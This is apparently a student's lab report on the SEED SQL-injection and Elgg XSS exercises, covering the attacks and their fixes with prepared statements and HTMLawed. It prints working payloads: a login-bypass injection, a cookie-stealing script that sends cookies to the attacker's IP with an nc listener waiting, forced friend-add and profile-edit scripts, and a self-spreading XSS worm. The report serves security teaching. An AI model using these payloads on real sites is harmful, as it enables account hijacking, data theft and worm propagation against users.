实践十 Web应用程序安全攻防
实践内容
SQL注入攻击和XSS攻击都是常见的网络安全攻击方式。SQL注入攻击指的是攻击者在 HTTP 请求中注入恶意 SQL 命令,服务器用请求参数构造数据库 SQL 命令时,恶意 SQL 被一起构造,并在数据库中执行,以便得到数据库中的感兴趣的数据或对数据库进行读取、修改、删除、插入等敏感的操作,从而导致数据被泄露或者被篡改。
XSS攻击指的是攻击者在网页中注入恶意脚本代码,使得用户在浏览网页时,恶意脚本代码会被执行,从而达到攻击者的目的。XSS 攻击可以分为反射型、存储型和 DOM 型三种类型。
SQL注入攻击和XSS攻击都是常见的网络安全问题。为了防止这些问题,我们可以采取一些措施来保护我们的网站。例如,对于 SQL 注入攻击,我们可以使用参数化查询来防止 SQL 注入攻击;对于 XSS 攻击,我们可以使用输入验证和输出编码来防止 XSS 攻击123。
本次实验为了学习、了解和实践两种攻击形式,我们将使用SEEDUbuntu来进行一系列的实验
实践过程
一、SEED SQL注入攻击与防御实验
我们已经创建了一个Web应用程序,并将其托管在 三达不溜.SEEDLabSQLInjection.com。该Web应用程序是一个简单的员工管理应用程序。员工可以通过此Web应用程序查看和更新数据库中的个人信息。此Web应用程序主要有两个角色:管理员是特权角色,可以管理每个员工的个人资料信息。员工是一般角色,可以查看或更新自己的个人资料信息。完成以下任务:
- (1)熟悉SQL语句: 我们已经创建了一个名为Users的数据库,其中包含一个名为creditential的表。该表存储了每个员工的个人信息(例如,eid,密码,薪水,ssn等)。在此任务中,您需要使用数据库来熟悉SQL查询。
- (2)对SELECT语句的SQL注入攻击:上述Web应用存在SQL输入漏洞,任务是在不知道密码的情况下登陆该Web应用程序。
- (3)对UPDATE语句的SQL注入攻击:通过员工的更新个人界面实施UPDATE语句的SQL注入攻击。
- (4)SQL对抗:修复上述SQL注入攻击漏洞。
(1)熟悉SQL语句
1、确认Apache服务
打开Ubuntu,输入命令,分别启动Apache和查看对应的Apache状态
sudo service apache2 start
sudo service apache2 status
自带的Firefox有HTTP Header Live
2.查看Ubuntu所存在的数据库
使用命令mysql -u root -pseedubuntu登录mysql数据库
输入命令show databases;查看已有数据库
输入命令use Users;切换到其中的Users数据库
输入命令show tables;查看对应的表格
输入SQL查询语句select * from credential;对该表进行查询
针对该表输入select * from credential where Name = 'Admin';查看用户Admin的相关信息
(2)对SELECT语句的SQL注入攻击
打开网址http://www.seedlabsqlinjection.com/
首先我们需要找到这个页面的源代码
在/var/www/SQLInjection/目录下可以找到unsafe_home页面的源代码,使用sudo vim /var/www/SQLInjection/unsafe_home.php查看
可以看到主要的SQL语句为$sql = "SELECT id, name, eid, salary, birth, ssn, address, email, nickname, Password FROM credential WHERE name= ’$input_uname’ and Password=’$hashed_pwd’";因此可以在这里用SQL注入的方式进行攻击,可以看到之前查到的用户Admin
这里将输入Admin' #说明用'符号将SQL语句强行终止,并且加上#将后面的语句全部注释
成功实行注入攻击
不仅仅是Admin用户,这张表的任意一个用户都可以用SQL注入的形式进行登录访问,此处以Alice用户为例:
访问成功
(3)对UPDATE语句的SQL注入攻击
在UPDATE编辑数据库内容的页面查看其源码可以发现主要是调动了unsafe_edit_backend.php这个文件,因此如果需要对UPDATE语句进行注入攻击需要对该页面源码进行查看其具体的UPDATE语句
找到文件unsafe_edit_backend.php,利用vim命令进入
vim unsafe_edit_backend.php
第一个内容是input_nickname,因此和上面的语句一样直接进行构造注入语句
', Salary='2333333' where name='Admin'; #
修改成功
(4)SQL对抗:修复上述SQL注入攻击漏洞
为什么会存在SQL注入攻击的漏洞,其主要原因是因为没有对输入的SQL语句中的数据和命令进行标识和区分
主要使用php语言中的bind_param绑定参数,在SQL语句中预设好参数,并暂时用?来标记,接下来输入的参数将逐步替代?
$sql = $conn->prepare("SELECT id, name, eid, salary, birth, ssn, phoneNumber, address, email,nickname,Password FROM credential WHERE name= ? and Password= ?");
$sql->bind_param("ss", $input_uname, $hashed_pwd);
在修改SQL语句后进行输入SQL注入命令
可以发现已经显示输入错误了
同理,对UPDATE语句进行同样的修改
$sql = $conn->prepare("UPDATE credential SET nickname=?,email=?,address=?,PhoneNumber=? where ID=$id;");
$sql->bind_param("ssss", $input_nickname, $input_email,$input_address, $input_phonenumber);
二、SEED XSS跨站脚本攻击实验(Elgg)
为了演示攻击者可以利用XSS漏洞做什么,我们在预先构建的Ubuntu VM映像中设置了一个名为Elgg的Web应用程序。在本实验中,学生需要利用此漏洞对经过修改的Elgg发起XSS攻击,攻击的最终目的是在用户之间传播XSS蠕虫,这样,无论是谁查看的受感染用户个人资料都将被感染。
-
(1)发布恶意消息,显示警报窗口:在您的Elgg配置文件中嵌入一个JavaScript程序,以便当另一个用户查看您的配置文件时,将执行JavaScript程序并显示一个警报窗口。
-
(2)弹窗显示cookie信息:将cookie信息显示。
-
(3)窃取受害者的cookies:将cookie发送给攻击者。
-
(4)成为受害者的朋友:使用js程序加受害者为朋友,无需受害者干预,使用相关的工具了解Elgg加好友的过程。
-
(5)修改受害者的信息:使用js程序使得受害者在访问Alice的页面时,资料无需干预却被修改。
-
(6)编写XSS蠕虫。
-
(7)对抗XSS攻击。
(1)发布恶意消息,显示警报窗口
首先登陆网站http://www.xsslabelgg.com
用户名密码分别为上个实验的用户名,密码:seed+用户名
Admin除外,Admin的密码是seedelgg
这里以Alice为例,密码为seedalice
点击头像选择Edit profile选项
在Brief description中输入xss攻击代码
<script> alert('xss');</script>
系统给出警告
(2)弹窗显示cookie信息:将cookie信息显示。
将原本的xss内容换成获取cookie的语句
<script> alert(document.cookie);</script>
可以看到相关的cookie
(3)窃取受害者的cookies:将cookie发送给攻击者。
查看本机IP为192.168.200.3
选取端口2333
同时选取攻击代码为<script>document.write('<img src=http://192.168.200.3:2333?c='+escape(document.cookie) + ' >');</script>
该攻击代码将目标(Boby)的cookie放入一个请求,然后向攻击者(Alice)发送
我们将攻击代码设在Alice的Brief description中
Logout后用Boby的账户访问Alice的界面,同时输入命令nc -l 2333 -v来监听端口
最后拿到了他的cookie
(4)成为受害者的朋友
我们需要记录一下该网页更新朋友相关信息的内容
在Alice登录的情况下,点击More->Member->Boby,点击Add friend
同时F12打开开发者工具,可以发现上传了一个POST请求
可知请求的地址是http://www.xsslabelgg.com/action/friends/add
第一个参数是friend=、第二个参数是&__elgg_ts=、第三个参数是&__elgg_token=
因此有xss攻击代码
<script type="text/javascript">
window.onload = function () {
var Ajax=null;
var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
var token="&__elgg_token="+elgg.security.token.__elgg_token;
//Construct the HTTP request to add Samy as a friend.
var sendurl="http://www.xsslabelgg.com/action/friends/add?friend=44" + ts + token;
//Create and send Ajax request to add friend
Ajax=new XMLHttpRequest();
Ajax.open("GET",sendurl,true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
Ajax.send();
}
</script>
该段代码获取访问者的__elgg_ts和__elgg_token,然后使用先前找到的URL强制加上好友,将总的url发送出去,这段代码放在Alice的About me下面,务必是在edit html的情况下进行输入才可以执行!
这里使用Charlie的账号做实验,首先登陆,可以看到现在朋友一栏为空
访问了一下Alice的主页发现自动添加了Alice的好友(甚至Alice自己是自己的好友)
(5)修改受害者的信息
依葫芦画瓢,和上一个添加好友的操作一样,这一次记录一下修改about me的请求连接
构造攻击代码
<script type="text/javascript">
window.onload = function(){
//JavaScript code to access user name, user guid, Time Stamp __elgg_ts
//and Security Token __elgg_token
var userName=elgg.session.user.name;
var guid="&guid="+elgg.session.user.guid;
var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
var token="&__elgg_token="+elgg.security.token.__elgg_token;
//Construct the content of your url.
var content= token + ts + "name=" + userName + "&description=<p>20222806cxd</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
alert(content)
//FILL IN
var samyGuid=44;
//FILL IN
if(elgg.session.user.guid!=samyGuid)
{
//Create and send Ajax request to modify profile
var Ajax=null;
Ajax=new XMLHttpRequest();
Ajax.open("POST",sendurl,true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded");
Ajax.send(content);
}
}
</script>
换Charlie的账号去访问的时候被强制修改了
(6)编写XSS蠕虫。
按照之前的原理编写蠕虫代码
<script id="worm" type="text/javascript">
window.onload = function(){
var headerTag = "<script id=\'worm\' type=\'text/javascript\'>";
var jsCode = document.getElementById("worm").innerHTML;
var tailTag = "</" + "script>";
var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);
var userName=elgg.session.user.name;
var guid="&guid="+elgg.session.user.guid;
var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
var token="&__elgg_token="+elgg.security.token.__elgg_token;
//Construct the content of your url.
var content= token + ts + "&name=" + userName + "&description=<p>20222806cxd"+ wormCode + "</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
alert(content)
var samyGuid=44;
if(elgg.session.user.guid!=samyGuid)
{
var Ajax=null;
Ajax=new XMLHttpRequest();
Ajax.open("POST",sendurl,true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded");
Ajax.send(content);
}
}
</script>
已被攻击
(7)对抗XSS攻击。
登录管理员账号利用网页内部的HTMLawed进行对抗攻击
路径Account->Administrator->plugins,
重新登录其他账户测试XSS攻击是否有效
可以发现已经失效
学习中遇到的问题及解决
问题1:修改hostname以后无法使用sudo命令
解决方法:主要是在/etc/hosts中127.0.1.1对应的VM并未改回新的hostname:20222806cxd,然后修改这个文件又需要sudo权限,所以需要新的方法进行修改:
开启两个终端,第一个终端里执行:
echo $$
第二个终端里执行:
pkttyagent --process PID_FROM_STEP_1 #这里为第一个终端里的PID
这个时候就可以在第一个终端里执行:
pkexec sudo vim /etc/hosts
pkexec sudo vim /etc/hostname
参考博客: https://blog.csdn.net/Kim891212/article/details/101244618
实践总结
经过本次实验的学习,我较为印象深刻地学习了SQL注入攻击和XSS攻击、以及两者相应的反制方法,希望能在未来可以进一步学习这两个攻击的相关内容和应用
扫一扫
8306
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
